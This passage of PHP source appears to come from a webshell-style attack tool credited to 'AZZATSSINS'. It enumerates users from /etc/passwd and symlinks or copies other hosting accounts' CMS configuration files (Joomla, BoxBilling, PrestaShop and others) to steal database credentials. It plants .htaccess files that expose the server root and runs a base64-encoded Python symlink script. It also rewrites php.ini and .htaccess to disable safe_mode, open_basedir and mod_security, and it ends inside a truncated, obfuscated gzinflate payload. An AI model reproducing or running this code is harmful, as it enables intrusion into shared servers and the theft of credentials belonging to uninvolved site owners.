  405. symlink('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  406. symlink('/home/'.$user.'/public_html/bb-config.php',$user.' <~ BOXBILLING.txt');
  407. symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.' <~ BOXBILLING.txt');
  408. symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.' <~ BOXBILLING.txt');
  409. symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.' <~ BOXBILLING.txt');
  410. symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.' <~ BOXBILLING.txt');
  411. symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.' <~ BOXBILLING.txt');
  412. symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.' <~ BOXBILLING.txt');
  413. symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.' <~ BOXBILLING.txt');
  414. symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.' <~ BOXBILLING.txt');
  415. symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.' <~ BOXBILLING.txt');
  416. symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.' <~ BOXBILLING.txt');
  417. symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.' <~ BOXBILLING.txt');
  418. symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.' <~ BOXBILLING.txt');
  419. symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.' <~ BOXBILLING.txt');
  420. symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.' <~ BOXBILLING.txt');
  421. symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.' <~ BOXBILLING.txt');
  422. symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.' <~ BOXBILLING.txt');
  423. symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.' <~ BOXBILLING.txt');
  424. symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.' <~ BOXBILLING.txt');
  425. /*You Can ReCoded But Don't Change ©CopyRight*/
  426. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  427. symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  428. symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  429. symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  430. symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  431. symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  432. symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  433. symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  434. symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  435. symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  436. symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  437. symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  438. symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  439. symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  440. symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  441. symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  442. symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  443. symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  444. symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  445. symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  446. symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  447. symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  448. symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  449. symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  450. copy('/home/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  451. symlink('/home/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  452. copy('/home/'.$user.'/public_html/bw-configs/config.ini',$user.' <~ BOSWEB.txt');
  453. symlink('/home/'.$user.'/public_html/bw-configs/config.ini',$user.' <~ BOSWEB.txt');
  454. copy('/home/'.$user.'/public_html/config/koneksi.php',$user.' <~ LOKOMEDIA.txt');
  455.  
  456. symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.' <~ LOKOMEDIA.txt');
  457.  
  458. copy('/home/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  459. symlink('/home/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  460. copy('/home/'.$user.'/public_html/slconfig.php',$user.' <~ SITELOK.txt');
  461. symlink('/home/'.$user.'/public_html/slconfig.php',$user.' <~ SITELOK.txt');
  462.  
  463. }
  464. echo '<center> PROCESS DONE, You Can Go To The Fucking Folder <a href='.$folfig.'>'.$folfig.'</a> And View You The GodDamn Grab Configs...!!! <br> <marquee><font color=red><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>^_^ / Bye.....</a></font></marquee></center>';
  465. }
  466.  
  467. }
  468.  
  469. if($_POST['azzatssins2']){
  470. //$us = file_get_contents("/etc/passwd");
  471. $usa = fopen('/etc/passwd','r');
  472. $dir = mkdir('jmp', 0777);
  473. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
  474. $frr = fopen('jmp/.htaccess', 'w');
  475. fwrite($frr, $rrrr);
  476. while($us = fgets($usa)){
  477.  if($us==""){
  478.  echo "<font color=red>can't read /etc/passwd</font>";
  479.  }
  480. else{
  481.  preg_match_all('/(.*?):x:/', $us, $user_byk);
  482.  foreach($user_byk[1] as $user){
  483.  $dir1 = "/home/$user/public_html/";
  484. if(is_readable($dir1)){
  485.  echo "<font color=lime>[+]</font> <font color=green><b><i><font color='lime'>$dir1</i></b></font><br>"; }
  486. else{
  487.     }
  488. }
  489. }
  490.  
  491. }}
  492. if($_POST['azzatssins3']){
  493. $py =base64_decode('Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCg0Kb3MubWFrZWRpcnMoJ3NsJykNCm9zLmNoZGlyKCdzbCcpDQoNCnN1c3I9W10NCnNpdGV4PVtdDQpvcy5zeXN0ZW0oImxuIC1zIC8gQVpaQVRTU0lOUyIpDQoNCmggPSAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzXG5EaXJlY3RvcnlJbmRleCBzbFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5waHBcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPHRpdGxlPlN5bWJvbGljIExpbmtzPC90aXRsZT48Ym9keSBiZ2NvbG9yPWJsYWNrPjxjZW50ZXI+PGJyPjxkaXYgc3R5bGU9YmFja2dyb3VuZDptYXJvb247bWFyZ2luOjBweDtwYWRkaW5nOjRweDt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjpzaWx2ZXI7PjxpPjxmb250IGNvbG9yPWxpbWU+JmNvcHk7IDwvZm9udD48YSBocmVmPW1haWx0bzpjeWJlcnNlcmtlcnNAZ21haWwuY29tPkFaWkFUU1NJTlMgQ1lCRVJTRVJLRVJTPC9hPjwvaT48YnI+PGJyPjxicj48L2NlbnRlcj4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJzeW1saW5rLmh0bSIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJyPjxicj48Y2VudGVyPjxicj48ZGl2IHN0eWxlPWJhY2tncm91bmQ6dmlvbGV0O21hcmdpbjowcHg7cGFkZGluZzo1cHg7dGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6d2hpdGU7PjxiPjxpPjxmb250IGNvbG9yPXNpbHZlcj48Zm9udCBjb2xvcj1saW1lPiVzPC9mb250PiB8IDxmb250IGNvbG9yPW9yYW5nZT4lczwvZm9udD4gfCA8YSBocmVmPUFaWkFUU1NJTlMvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvZm9udD48L2k+PC9iPjwvZGl2PjwvY2VudGVyPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQ0KCQkJY291bnRlcj1jb3VudGVyKzE=');
  494. $pys = fopen("symlink.py","w+");
  495. fwrite($pys,$py);
  496. system('python symlink.py');
  497. system('rm symlink.py');
  498. echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
  499. }
  500. if($_POST['azzatssins4']){
  501. @session_start();
  502. @set_time_limit(0);
  503. @ini_set('max_execution_time',0);
  504. @mkdir('xazs',0777);
  505. $sempak  = "Options all <br>
  506. DirectoryIndex azzatssins.html <br>
  507. AddType text/plain .php <br>
  508. AddHandler server-parsed .php <br>  
  509. AddType text/plain .html <br>
  510. AddHandler txt .html <br>
  511. Require None <br>
  512. Satisfy Any";
  513. $masuk =@fopen ('xazs/.htaccess','w');
  514. fwrite($masuk ,$sempak);
  515. @symlink('/','xazs/azzatssins.txt');  
  516. $pg = basename(__FILE__);
  517.  
  518.  
  519. if(is_readable("/var/named")){
  520. echo"<title>Symlink</title><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
  521. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  522. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  523. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  524. <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
  525. $list = scandir("/var/named");
  526. foreach($list as $domain){
  527. if(strpos($domain,".db")){
  528. @error_reporting(0);
  529. @ini_set('log_errors',0);
  530. @ini_set('error_log',NULL);
  531.  
  532. $i += 1;
  533. $domain = str_replace('.db','',$domain);
  534. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  535. echo "<tr>
  536. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  537. <td align='center'><font color='white'>".$owner['name']."</td>
  538. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  539. }
  540. }
  541. flush();
  542. flush();
  543. }
  544. echo "</tr></table></div></html>";
  545. }
  546. if($_POST['azzatssins5']){
  547. echo ini_get("safe_mode");
  548.  echo ini_get("open_basedir");
  549.  ini_restore("safe_mode");
  550.  ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
  551. fwrite($phi,"safe_mode = Off
  552. disable_functions = NONE
  553. safe_mode_gid = OFF
  554. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
  555. fwrite($phii,"<IfModule mod_security.c>
  556. KillFilterEngine Off
  557. KillFilterScanPOST Off
  558. KillFilterCheckURLEncoding Off
  559. KillFilterCheckUnicodeEncoding Off
  560. </IfModule>
  561. "); }
  562. if($_POST['azzatssins6']){
  563. $mys =base64_decode('PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocm